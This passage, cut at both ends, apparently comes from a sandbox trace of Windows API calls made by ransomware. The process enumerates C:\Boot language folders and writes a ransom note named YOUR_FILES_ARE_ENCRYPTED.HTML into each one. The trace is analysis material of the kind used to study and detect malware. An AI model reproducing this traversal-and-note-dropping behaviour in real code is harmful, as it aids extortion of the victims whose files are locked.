hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.514] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.514] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.514] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0104.515] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.515] lstrlenW (lpString=".mui") returned 4 [0104.515] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.515] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.515] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.515] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0104.515] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.515] lstrlenW (lpString=".mui") returned 4 [0104.515] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.515] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.515] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.515] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.515] GetProcessHeap () returned 0x600000 [0104.515] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.515] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.516] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.517] CloseHandle (hObject=0x300) returned 1 [0104.517] GetProcessHeap () returned 0x600000 [0104.517] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.517] GetProcessHeap () returned 0x600000 [0104.517] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.518] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="es-ES", cAlternateFileName="")) returned 1 [0104.518] StrStrIW (lpFirst="es-ES", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.518] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0104.518] GetProcessHeap () returned 0x600000 [0104.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.519] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0104.519] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*") returned="\\\\?\\C:\\Boot\\es-ES\\*" [0104.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0104.519] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.519] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.520] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.520] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0104.520] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.520] lstrlenW (lpString=".mui") returned 4 [0104.520] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.520] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.520] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.520] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui") returned 33 [0104.520] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.520] lstrlenW (lpString=".mui") returned 4 [0104.520] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.520] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.520] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0104.520] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.520] GetProcessHeap () returned 0x600000 [0104.520] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.520] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\es-es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.521] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.522] CloseHandle (hObject=0x300) returned 1 [0104.523] GetProcessHeap () returned 0x600000 [0104.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.523] GetProcessHeap () returned 0x600000 [0104.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.523] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="es-MX", cAlternateFileName="")) returned 1 [0104.523] StrStrIW (lpFirst="es-MX", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.523] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-MX") returned 17 [0104.523] GetProcessHeap () returned 0x600000 [0104.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.524] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\es-MX" | out: lpString1="\\\\?\\C:\\Boot\\es-MX") returned="\\\\?\\C:\\Boot\\es-MX" [0104.524] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-MX", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\es-MX\\*") returned="\\\\?\\C:\\Boot\\es-MX\\*" [0104.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-MX\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.524] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.525] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.525] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.525] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 33 [0104.525] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.525] lstrlenW (lpString=".mui") returned 4 [0104.525] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.525] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.525] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.525] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.525] GetProcessHeap () returned 0x600000 [0104.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.525] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\es-mx\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.525] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.526] CloseHandle (hObject=0x300) returned 1 [0104.527] GetProcessHeap () returned 0x600000 [0104.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.527] GetProcessHeap () returned 0x600000 [0104.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.527] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="et-EE", cAlternateFileName="")) returned 1 [0104.527] StrStrIW (lpFirst="et-EE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.527] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\et-EE") returned 17 [0104.527] GetProcessHeap () returned 0x600000 [0104.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.528] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\et-EE" | out: lpString1="\\\\?\\C:\\Boot\\et-EE") returned="\\\\?\\C:\\Boot\\et-EE" [0104.528] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\et-EE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\et-EE\\*") returned="\\\\?\\C:\\Boot\\et-EE\\*" [0104.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\et-EE\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.529] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.529] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.529] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.529] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 33 [0104.529] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.529] lstrlenW (lpString=".mui") returned 4 [0104.529] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.529] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.529] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.529] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.529] GetProcessHeap () returned 0x600000 [0104.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.529] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\et-ee\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.530] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.531] CloseHandle (hObject=0x300) returned 1 [0104.531] GetProcessHeap () returned 0x600000 [0104.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.531] GetProcessHeap () returned 0x600000 [0104.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.532] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0104.532] StrStrIW (lpFirst="fi-FI", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.532] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0104.532] GetProcessHeap () returned 0x600000 [0104.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.533] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0104.533] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*") returned="\\\\?\\C:\\Boot\\fi-FI\\*" [0104.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.533] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.533] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.533] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.533] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0104.533] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.533] lstrlenW (lpString=".mui") returned 4 [0104.533] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.533] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.533] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.533] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui") returned 33 [0104.533] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.533] lstrlenW (lpString=".mui") returned 4 [0104.533] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" 